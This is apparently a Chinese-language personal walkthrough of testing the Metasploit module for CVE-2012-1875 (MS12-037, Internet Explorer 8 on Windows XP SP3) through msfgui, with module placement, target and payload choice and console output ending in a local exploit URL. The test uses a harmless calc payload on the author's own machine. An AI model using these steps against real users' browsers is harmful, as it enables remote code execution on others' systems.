本來想使用Metasploit的控制台來測試,但是控制台怎麼也找不到這個exploit,暫不知道原因,後來使用msfgui來測試的。
1、rb檔案下載下傳位址:http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb
2、把下載下傳回來的rb檔案放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong檔案夾下面,你也可以不改名,或者放到已有的檔案夾下面,但是一定要放到exploits下面,你懂的。
3、在msfgui界面上,使用File菜單Search選項,搜尋2012-1875,如圖,不出意外應該是可以搜尋到的啊!
4、選中搜到的條目,具體就是上面的magictong/cve-2012-1875 - Normal,然後點選Launch按鈕,進入配置頁面。
5、在配置頁面,首先選擇Targets,我的目标系統是xpsp3,我選擇了IE 8 on Windows XP SP3 with msvcrt ROP,因為這個漏洞要過DEP,是以利用會麻煩點。
6、然後選擇Payload,這裡選擇了exec,啟動calc(電腦)。SRVHOST裡面輸入本機(MSF所在的機器,不是有漏洞的機器,如果有漏洞機器就是MSF所在的機器,則輸入127.0.0.1即可)的區域網路IP,如果直接在本機測試,輸入127.0.0.1即可。
7、然後點選Run inConsole ,等待,直到msfgui的主界面下console TAB頁打出如下資訊:
msf exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.
8、現在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本機進行測試了。